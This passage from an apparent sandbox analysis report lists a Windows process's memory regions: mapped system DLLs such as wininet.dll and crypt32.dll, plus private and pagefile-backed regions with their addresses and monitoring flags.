start_va = 0x7fefb130000
end_va = 0x7fefb13efff
monitored = 0
entry_point = 0x7fefb131040
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 509
start_va = 0x7fefb140000
end_va = 0x7fefb149fff
monitored = 0
entry_point = 0x7fefb144938
region_type = mapped_file
name = "davhlpr.dll"
filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")
Region:
id = 510
start_va = 0x7fefb150000
end_va = 0x7fefb16bfff
monitored = 0
entry_point = 0x7fefb151198
region_type = mapped_file
name = "davclnt.dll"
filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll")
Region:
id = 511
start_va = 0x7fefb370000
end_va = 0x7fefb37afff
monitored = 0
entry_point = 0x7fefb374f8c
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 512
start_va = 0x7fefb440000
end_va = 0x7fefb454fff
monitored = 0
entry_point = 0x7fefb4460d8
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 513
start_va = 0x7fefb850000
end_va = 0x7fefb87cfff
monitored = 0
entry_point = 0x7fefb851010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 514
start_va = 0x7fefb8e0000
end_va = 0x7fefb950fff
monitored = 0
entry_point = 0x7fefb91ecc4
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 515
start_va = 0x7fefb9f0000
end_va = 0x7fefba04fff
monitored = 0
entry_point = 0x7fefb9f1050
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 516
start_va = 0x7fefba10000
end_va = 0x7fefba1bfff
monitored = 0
entry_point = 0x7fefba118a4
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 517
start_va = 0x7fefba20000
end_va = 0x7fefba35fff
monitored = 0
entry_point = 0x7fefba211a0
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 518
start_va = 0x7fefbb50000
end_va = 0x7fefbb60fff
monitored = 0
entry_point = 0x7fefbb51070
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 519
start_va = 0x7fefbb80000
end_va = 0x7fefbca9fff
monitored = 0
entry_point = 0x7fefbb83810
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")
Region:
id = 520
start_va = 0x7fefbcb0000
end_va = 0x7fefbce4fff
monitored = 0
entry_point = 0x7fefbcb1064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 521
start_va = 0x7fefbcf0000
end_va = 0x7fefbd07fff
monitored = 0
entry_point = 0x7fefbcf1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 522
start_va = 0x7fefbdb0000
end_va = 0x7fefbdf2fff
monitored = 0
entry_point = 0x7fefbdbc168
region_type = mapped_file
name = "duser.dll"
filename = "\\Windows\\System32\\duser.dll" (normalized: "c:\\windows\\system32\\duser.dll")
Region:
id = 523
start_va = 0x7fefbe00000
end_va = 0x7fefbef1fff
monitored = 0
entry_point = 0x7fefbe2ac20
region_type = mapped_file
name = "dui70.dll"
filename = "\\Windows\\System32\\dui70.dll" (normalized: "c:\\windows\\system32\\dui70.dll")
Region:
id = 524
start_va = 0x7fefbf00000
end_va = 0x7fefc114fff
monitored = 0
entry_point = 0x7fefc0d64b0
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")
Region:
id = 525
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 526
start_va = 0x7fefc180000
end_va = 0x7fefc2abfff
monitored = 0
entry_point = 0x7fefc1894bc
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 527
start_va = 0x7fefc300000
end_va = 0x7fefc4f3fff
monitored = 0
entry_point = 0x7fefc48c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 528
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 529
start_va = 0x7fefcd00000
end_va = 0x7fefcd4bfff
monitored = 0
entry_point = 0x7fefcd07950
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 530
start_va = 0x7fefcdc0000
end_va = 0x7fefce06fff
monitored = 0
entry_point = 0x7fefcdc1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 531
start_va = 0x7fefd0c0000
end_va = 0x7fefd0d7fff
monitored = 0
entry_point = 0x7fefd0c3b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 532
start_va = 0x7fefd230000
end_va = 0x7fefd251fff
monitored = 0
entry_point = 0x7fefd235d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 533
start_va = 0x7fefd5c0000
end_va = 0x7fefd5e2fff
monitored = 0
entry_point = 0x7fefd5c1198
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 534
start_va = 0x7fefd660000
end_va = 0x7fefd66afff
monitored = 0
entry_point = 0x7fefd661030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 535
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 536
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 537
start_va = 0x7fefd770000
end_va = 0x7fefd7acfff
monitored = 0
entry_point = 0x7fefd7718f4
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 538
start_va = 0x7fefd7b0000
end_va = 0x7fefd7c3fff
monitored = 0
entry_point = 0x7fefd7b10e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 539
start_va = 0x7fefd7d0000
end_va = 0x7fefd7defff
monitored = 0
entry_point = 0x7fefd7d19b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 540
start_va = 0x7fefd870000
end_va = 0x7fefd87efff
monitored = 0
entry_point = 0x7fefd871020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 541
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 542
start_va = 0x7fefd990000
end_va = 0x7fefd9a9fff
monitored = 0
entry_point = 0x7fefd991558
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 543
start_va = 0x7fefd9b0000
end_va = 0x7fefd9e5fff
monitored = 0
entry_point = 0x7fefd9b1474
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 544
start_va = 0x7fefd9f0000
end_va = 0x7fefda2afff
monitored = 0
entry_point = 0x7fefd9f1324
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 545
start_va = 0x7fefda30000
end_va = 0x7fefdb9cfff
monitored = 0
entry_point = 0x7fefda310b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 546
start_va = 0x7fefdba0000
end_va = 0x7fefdd17fff
monitored = 0
entry_point = 0x7fefdba10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 547
start_va = 0x7fefdd20000
end_va = 0x7fefde49fff
monitored = 0
entry_point = 0x7fefdd210d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 548
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 549
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 550
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 551
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 552
start_va = 0x7fefe1f0000
end_va = 0x7fefef77fff
monitored = 0
entry_point = 0x7fefe26cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 553
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 554
start_va = 0x7fefef90000
end_va = 0x7feff166fff
monitored = 0
entry_point = 0x7fefef91010
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 555
start_va = 0x7feff170000
end_va = 0x7feff3c8fff
monitored = 0
entry_point = 0x7feff171340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 556
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 557
start_va = 0x7feff4e0000
end_va = 0x7feff531fff
monitored = 0
entry_point = 0x7feff4e10d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 558
start_va = 0x7feff540000
end_va = 0x7feff547fff
monitored = 0
entry_point = 0x7feff541504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 559
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 560
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 561
start_va = 0x7feff730000
end_va = 0x7feff7c6fff
monitored = 0
entry_point = 0x7feff7313e8
region_type = mapped_file
name = "comdlg32.dll"
filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll")
Region:
id = 562
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 563
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 564
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 565
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 566
start_va = 0x7feffa10000
end_va = 0x7feffa5cfff
monitored = 0
entry_point = 0x7feffa11070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 567
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 568
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 569
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 570
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 571
start_va = 0x7fffff72000
end_va = 0x7fffff73fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff72000"
filename = ""
Region:
id = 572
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 573
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 574
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 575
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 576
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 577
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 578
start_va = 0x7fffff80000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 579
start_va = 0x7fffff90000
end_va = 0x7fffff9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 580
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 581
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 582
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 583
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 584
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 585
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 586
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 587
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 588
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 589
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 590
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 591
start_va = 0x7fffffd8000
end_va = 0x7fffffd9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 592
start_va = 0x7fffffda000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 593
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 594
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 595
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 596
start_va = 0xa2d0000
end_va = 0xa3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a2d0000"
filename = ""
Region:
id = 597
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 598
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 599
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 600
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 601
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 602
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 603
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 604
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 605
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 606
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 607
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 608
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 609
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 610
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 611
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 612
start_va = 0xaf80000
end_va = 0xb07ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000af80000"
filename = ""
Region:
id = 613
start_va = 0xb080000
end_va = 0xb17ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b080000"
filename = ""
Region:
id = 614
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 615
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 616
start_va = 0x7fef6fe0000
end_va = 0x7fef717bfff
monitored = 0
entry_point = 0x7fef6fe1030
region_type = mapped_file
name = "networkexplorer.dll"
filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll")
Region:
id = 617
start_va = 0x9d90000
end_va = 0x9e90fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009d90000"
filename = ""
Region:
id = 618
start_va = 0x6eb0000
end_va = 0x6eb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006eb0000"
filename = ""
Region:
id = 619
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 620
start_va = 0x9d90000
end_va = 0x9e8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000009d90000"
filename = ""
Region:
id = 621
start_va = 0xa6f0000
end_va = 0xa7effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000a6f0000"
filename = ""
Region:
id = 622
start_va = 0xb250000
end_va = 0xb34ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b250000"
filename = ""
Region:
id = 623
start_va = 0xb390000
end_va = 0xb48ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000000b390000"
filename = ""
Region:
id = 624
start_va = 0x7fffff64000
end_va = 0x7fffff65fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff64000"
filename = ""
Region:
id = 625
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 626
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 627
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 628
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 629
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006ec0000"
filename = ""
Region:
id = 630
start_va = 0x719b0000
end_va = 0x72d05fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll"
filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll")
Region:
id = 631
start_va = 0x6ec0000
end_va = 0x6ec0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "imageres.dll.mui"
filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui")
Region:
id = 632
start_va = 0x7fef29b0000
end_va = 0x7fef2a71fff
monitored = 0
entry_point = 0x7fef29b102c
region_type = mapped_file
name = "mssvp.dll"
filename = "\\Windows\\System32\\mssvp.dll" (normalized: "c:\\windows\\system32\\mssvp.dll")
Region:
id = 633
start_va = 0x7fef72a0000
end_va = 0x7fef72bafff
monitored = 0
entry_point = 0x7fef72a2fa0
region_type = mapped_file
name = "mapi32.dll"
filename = "\\Windows\\System32\\mapi32.dll" (normalized: "c:\\windows\\system32\\mapi32.dll")
Region:
id = 634
start_va = 0x6ec0000
end_va = 0x6ec1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mssvp.dll.mui"
filename = "\\Windows\\System32\\en-US\\mssvp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mssvp.dll.mui")
Region:
id = 635
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 636
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 637
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 638
start_va = 0x8de0000
end_va = 0x8de6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 639
start_va = 0x8dd0000
end_va = 0x8dd0fff
monitored = 0
entry_point = 0x0
